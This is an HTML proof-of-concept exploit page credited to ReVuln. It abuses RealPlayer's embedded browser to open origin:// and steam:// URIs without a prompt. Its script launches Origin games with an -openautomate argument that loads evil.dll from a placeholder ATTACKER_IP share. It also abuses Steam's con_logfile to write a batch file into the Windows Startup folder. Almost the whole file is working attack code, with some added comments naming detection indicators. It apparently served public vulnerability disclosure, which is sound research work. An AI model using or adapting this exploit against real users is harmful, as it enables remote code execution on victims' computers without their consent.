- <html>
- <body>
- <object
- id="test"
- type="application/vnd.rn-realplayer-javascript"
- width="0" height="0">
- </object>
- <script type="text/javascript">
- // Credits:
- // ReVuln
- // revuln.com
- // twitter.com/revuln
- // The embedded browser available in RealPlayer opens any registered URI
- // without prompting the user, just like Safari does, so the origin:// and steam://
- // navigations below raise no confirmation there. We use it as the trigger for both the Steam and Origin vulnerabilities.
- var check_if_rp = '#rp'; // URL fragment that marks the second load of this page
- if(document.location.href.indexOf(check_if_rp) < 0) {
- // browser: '#rp' is not in the URL, so this is the first load, in the regular browser
- document.write("BROWSER");
- var test = document.getElementById('test'); // the zero-size RealPlayer plugin object declared in the markup
- // open the RealPlayer browser on this same URL with '#rp' appended, through the plugin object
- test.OpenURLInPlayerBrowser(
- document.location.href + check_if_rp
- );
- } else {
- // RealPlayer: '#rp' is in the URL, so this load is presumably the one inside the embedded browser
- document.write("REALPLAYER");
- // Origin vulnerability: the LaunchGame URI below carries a CommandParams value (presumably forwarded to the game)
- // http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf
- // exploit the openautomate option of Crysis 3 and 2,
- // Battlefield 3 and others like RE5 and DMC4
- var crysis = '71503,71505,71645,71656,71708,71709,71710,71711,71779,1003897,1003898,1004521'; // presumably Origin ids for the Crysis titles; confirm against the paper
- var bf3 = '70619,71067,71171,71633,1000689'; // presumably Battlefield 3 ids
- var others = '71604,71606,71716,71613,1004689'; // presumably ids of the other affected titles
- window.location = // one origin:// URI: the three id lists joined by commas, then CommandParams
- 'origin://LaunchGame/'
- + crysis
- + ',' + bf3
- + ',' + others
- + '?CommandParams= -openautomate \\\\ATTACKER_IP\\evil.dll'; // ATTACKER_IP is a placeholder; a UNC path after -openautomate on a game command line is the artifact to alert on
- // Steam vulnerability... yes, Steam IS still vulnerable
- // http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
- // the following is the "original" PoC used in our video and shown at
- // BlackHat Europe 2013
- function do1() { // step 1: steam://run for app id 440 with extra -hijack -dev arguments
- window.location='steam://run/440// -hijack -dev';
- }
- function do2() { // step 2: %2b decodes to '+' and %5c to a backslash; con_logfile names a .bat in the Administrator Startup folder
- window.location='steam://run/440// -hijack %2bcon_logfile "%5cDocuments and Settings%5cAdministrator%5cStart Menu%5cPrograms%5cStartup%5cx.bat"';
- }
- function do3() { // step 3: echo "calc" (presumably captured by the log file set in step 2), then quit
- window.location='steam://run/440// -hijack %2becho calc %2bquit';
- }
- setTimeout("do1()", 0); // NOTE(review): a string argument to setTimeout is evaluated like eval(); a function reference is the non-eval form
- setTimeout("do2()", 20000); // 20 s after load
- setTimeout("do3()", 22000); // 22 s after load; a game process creating a file under a Startup folder is the host-side indicator
- }
- </script>
- </body>
- </html>